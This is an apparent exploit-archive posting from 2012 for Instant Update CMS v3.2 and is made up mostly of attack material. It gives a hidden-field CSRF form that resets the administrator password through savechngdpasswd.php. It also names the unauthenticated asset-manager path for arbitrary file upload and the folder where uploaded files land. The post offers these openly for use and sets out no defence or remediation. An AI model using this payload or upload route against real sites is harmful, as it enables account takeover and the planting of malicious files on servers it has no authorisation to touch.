facebook facebook twitter rss

Instant Update CMS v3.2 Arbitrary File Upload/CSRF Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 01-06-2012
Instant Update CMS v3.2  Arbitrary File Upload/CSRF Vulnerabilties
=======================================================================

#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.cubescripts.com/cms-script.php

#######################################################################

===[ Exploit ]===


CSRF [Change Password Admin]
=============================

<form method="POST" name="form1" action="http://SITE/manage/savechngdpasswd.php">
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="Password"/>
<input type="hidden" name="image.x" value="33"/>
<input type="hidden" name="image.y" value="11"/>
<input type="hidden" name="image" value="edit"/>
</form>

</body>
</html>


Remote Arbitrary File Upload
================================


http://SITE/manage/scripts/assetmanager/assetmanager.php?ffilter=media

Your File

http://SITE/UserFiles/

#######################################################################


# 1337day.com [2012-06-01]

Like us on Facebook :